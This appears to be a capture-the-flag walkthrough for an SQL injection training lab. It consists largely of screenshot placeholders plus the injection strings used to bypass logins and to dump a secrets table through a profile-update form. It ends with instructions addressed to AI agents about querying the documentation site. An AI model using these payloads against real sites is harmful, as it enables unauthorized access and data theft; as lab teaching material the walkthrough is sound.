# SQL Injection Lab

![](/files/-Mf0DpoDM9vsEz_VY2pS)

## Introduction

![](/files/-Mf0F5XHRp1GXmWp8Qz0)

## Introduction to SQL Injection: Part 1

![](/files/-Mf0GiXVKUW0-23oorDI)

![](/files/-Mf0GulE7Rytg3Tfk3Jd)

![](/files/-Mf0HCJAw8k8A2kGCYu7)

![](/files/-Mf0HLuIE26zcTpSGNFM)

![](/files/-Mf0H_A8LtVn5-JLnPeN)

Lets check the webpage

![](/files/-Mf0HsjojpVmp9bw_6fv)

### Challenge 1

Lets click on the first challenge

![](/files/-Mf0Hxo28VLTDfS9tWtM)

Lets use `1 or 1=1--` as the ProfileID and pass as the Password

![](/files/-Mf0IExSfTj3aDjD-Oi4)

Lets hit login

![](/files/-Mf0IL81FTztgqQShq0J)

We have the flag, lets go to the second challenge

### Challenge 2

![](/files/-Mf0IYkMByz7EBmojR6m)

This form only accepts strings, so lets use strings `1' or '1'='1'-- -` in the username and pass in the password.

![](/files/-Mf0IrCrmXim3Aefigmx)

![](/files/-Mf0J-fcoRycS577EA2B)

We have the flag, lets go to the next challenge

### Challenge 3

![](/files/-Mf0JEantlkYkGgxXqJ3)

The login form is being checked, so exploit the URL and we can do that by going to this URL (add it in the end of the current URL)

```
login?profileID=-1' or 1=1-- -&password=a
```

![](/files/-Mf0JmyURuSCWHp8ERHs)

Now lets go to this URL

![](/files/-Mf0JtRXMd9YAkNLm-d6)

We have the flag, lets go to the next challenge

### Challenge 4

![](/files/-Mf0K2oFdk75JwT-vUGA)

Lets use burp to capture the login request with random credentials

![](/files/-Mf0KN6hvC9OGiXqI1Oq)

Now lets change the `profileID` parameter.

![](/files/-Mf0K_G_ZGGLtqGSMPPB)

Now lets forward the request

![](/files/-Mf0Kg3dSt40VkaaWCZt)

We have the flag.

## Introduction to SQL Injection: Part 2

![](/files/-Mf5_BKKRFHKuCVI-lWF)

![](/files/-Mf5_RDu4iwuHpN3Uucm)

![](/files/-Mf5_Y4K8KFgIbOBHyr5)

![](/files/-Mf5_brgnmWM4olCZBB0)

Lets check the webpage

![](/files/-Mf5_kRZfsUg0JDPrwqm)

Lets login with the given credentials

![](/files/-Mf5aZQslSgj2_OMbzLx)

Lets go to the Edit Profile page

![](/files/-Mf5aeoLMBtYKK0_AZVD)

Lets use this sql query to exploit this form

```
',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
```

![](/files/-Mf5bP8KWpQAVWSXqZ9e)

Lets click Change

![](/files/-Mf5bV4pwa_ddbF7CgeF)

We have the flag


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/walkthroughs-easy/sql-injection-lab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.